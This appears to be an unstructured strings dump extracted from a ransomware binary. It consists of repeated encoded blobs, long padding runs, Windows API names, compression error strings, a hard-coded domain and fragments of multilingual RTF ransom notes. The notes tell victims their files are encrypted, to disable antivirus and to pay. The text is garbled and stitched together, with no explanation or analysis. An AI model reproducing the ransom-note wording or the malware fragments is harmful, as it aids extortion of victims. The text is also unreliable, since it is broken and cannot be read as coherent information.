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 NG error nghapus perangkat lunak ini, dan menonaktifkan anti-virus Anda untuk sementara, sampai Anda membayar dan pembayaran akan diproses. Jika anti}{\\rtlch\\fcs1 \\af53 \\ltrch\\fcs0 \\fs22\\cf6\\loch\\af31502\\hich\\af31502\\dbch\\af53\\insrsid6386681 -}{\\rtlch\\fcs1 \\af53 NGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD NGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADD 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 o mais acess\\'ed\\loch\\f31502 \\hich\\f31502 veis porque foram criptografados. Talvez voc\\'ea\\loch\\f31502 \\hich\\f31502 esteja ocupado procurando uma maneira de recuperar seus arquivos, mas n\\'e3\\loch\\f31502 \\hich\\f31502 o perca seu tempo. Ningu\\'e9 O que aconteceu com o meu computador? o remova este software e desative seu anti-v\\'ed\\loch\\f31502 rus por\\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 um tempo, at\\'e9\\loch\\f31502 \\hich\\f31502 que voc\\'ea\\loch\\f31502 \\hich\\f31502 pague eo pagamento seja processado. Se o seu anti-v ohjelmaa, ja poista virustentorjastasi hetkeksi, kunnes maksat ja maksut k\\'e4\\loch\\f31502 \\hich\\f31502 sitell\\'e4\\'e4\\loch\\f31502 \\hich\\f31502 n. Jos virustorjunta p\\'e4\\loch\\f31502 \\hich\\f31502 ivittyy ja poistaa t\\'e4\\loch\\f31502 \\hich\\f31502 m\\'e4 OpenMutexA OpenServiceA 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 oversubscribed distance tree oversubscribed dynamic bit lengths tree oversubscribed literal/length tree p v\\'e0\\loch\\f31502 o . p9ifjaposdfjhgosurijfaewrwergwea.com PA^A]A\\_^][ PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING 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 plik\\'f3\\loch\\f31528 \\hich\\f31528 w, nawet je\\'9c\\loch\\f31528 \\hich\\f31528 li zap\\'b3\\loch\\f31528 acisz! pode recuperar todos os seus arquivos de forma segura e f\\'e1\\loch\\f31502 \\hich\\f31502 cil. Mas voc\\'ea\\loch\\f31502 \\hich\\f31502 n\\'e3\\loch\\f31502 o tem tempo suficiente. PrivateKeyLifetimeSeconds PrivKeyCacheMaxItems PrivKeyCachePurgeIntervalSeconds ProductVersion ProviderInfo ProxyHttp1.1 pute}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid8458214\\charrsid12743656 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 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